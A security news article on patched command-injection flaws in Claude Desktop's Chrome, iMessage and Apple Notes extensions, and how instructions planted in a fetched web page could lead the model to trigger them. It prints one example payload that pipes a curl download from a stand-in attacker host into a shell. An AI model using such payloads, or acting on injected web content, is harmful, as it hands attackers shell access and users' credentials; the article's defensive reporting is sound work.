SHARE

PromptJacking: When AI Chat Prompts Become Cyber Attacks

Flaws in Claude Desktop’s extensions show how simple AI prompts can lead to system compromise.

Written By

Nov 5, 2025

eSecurity Planet content and product recommendations are editorially independent. We may make money when you click on links to our partners. Learn More

Artificial intelligence (AI) tools have rapidly become integral to modern workflows, assisting users with everything from data analysis to creative writing.

However, the discovery of critical vulnerabilities in trusted AI platforms serves as a reminder that even cutting-edge systems are not immune to traditional cybersecurity flaws.

The recent identification of remote code execution (RCE) vulnerabilities in Claude Desktop’s official extensions highlights a serious security concern in AI-integrated environments.

How a Simple Prompt Becomes a Breach
Understanding Claude Desktop Extensions
The Vulnerability
From Question to Compromise
The Hidden Risks of AI Integration

How a Simple Prompt Becomes a Breach

Koi researchers recently uncovered severe RCE vulnerabilities in three official Claude Desktop extensions — those for Chrome, iMessage, and Apple Notes.

Each contained the same fundamental flaw: unsanitized command injection.

This vulnerability allowed attackers to exploit Claude Desktop simply by manipulating the content of a user’s query or the data retrieved from a website.

In practical terms, this meant that a seemingly innocent question—such as “Where can I play paddle in Brooklyn?” — could trigger the execution of arbitrary code on the user’s machine.

Sensitive data like SSH keys, AWS credentials, or stored browser passwords could be stolen without any malicious download or phishing attempt.

The vulnerabilities were rated as high-severity (CVSS 8.9) by Anthropic, who have since patched the issues.

Understanding Claude Desktop Extensions

Claude Desktop extensions are designed as modular connection points — packaged as Model Context Protocol (MCP) servers — allowing Claude to interact directly with local applications.

Each extension is distributed as a .mcpb bundle, containing both the MCP server code and a manifest that describes its capabilities. They function similarly to Chrome extensions in concept but differ in implementation.

While Chrome extensions operate within the browser’s security sandbox, Claude Desktop extensions run fully unsandboxed on the local machine, with full system privileges.

This design choice allows deep integration but introduces risk. Extensions can read and modify files, execute system commands, and access stored credentials.

A command injection vulnerability in such an environment becomes a direct pathway to full system compromise.

The Vulnerability

At the core of the vulnerability was improper input sanitization. Each MCP server accepted user-provided input and passed it directly into AppleScript commands without escaping or validation.

For example, when Claude was instructed to open this URL in Chrome, the extension constructed an AppleScript command such as:

tell application “Google Chrome” to open location “${url}”

If the ${url} value contained a malicious payload — such as & do shell script “curl https://attacker.com/trojan | sh”& — it would execute arbitrary shell commands on the host system.

From Question to Compromise

The real danger came from prompt injection through web content. Claude frequently fetches and summarizes web pages to answer user queries.

If one of those pages is controlled by an attacker — or if a legitimate page is compromised — the content can be crafted to include instructions that trigger the vulnerability.

In such a scenario, a user might ask Claude a simple question, prompting the model to retrieve data from an attacker-controlled website.

That page, recognizing Claude’s user agent, could serve a hidden payload. Claude would then unwittingly execute the injected command through the vulnerable extension.

The result: remote attackers gaining local shell access with full permissions, enabling them to steal sensitive files, install backdoors, or exfiltrate credentials — all without the user noticing anything unusual.

The Hidden Risks of AI Integration

While these specific vulnerabilities have been patched, their existence underscores a broader issue with emerging AI extension ecosystems.

The MCP model allows developers to build extensions that interact deeply with local systems.

However, the combination of AI-assisted coding, limited security review, and the absence of sandboxing poses systemic risks.

As AI platforms grow more integrated with operating systems and enterprise environments, developers must adopt rigorous security practices, including strict input sanitization, privilege separation, and code auditing.

Organizations should also employ defense-in-depth measures, such as monitoring outbound network activity, enforcing least-privilege execution, and isolating AI tools from sensitive credentials.

The Claude Desktop vulnerabilities demonstrate that even trusted AI platforms can harbor severe security flaws with real-world consequences.

As the AI ecosystem expands, ensuring secure integration between AI models and local systems will be essential. The lesson is not to abandon these tools but to approach them with informed caution.

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.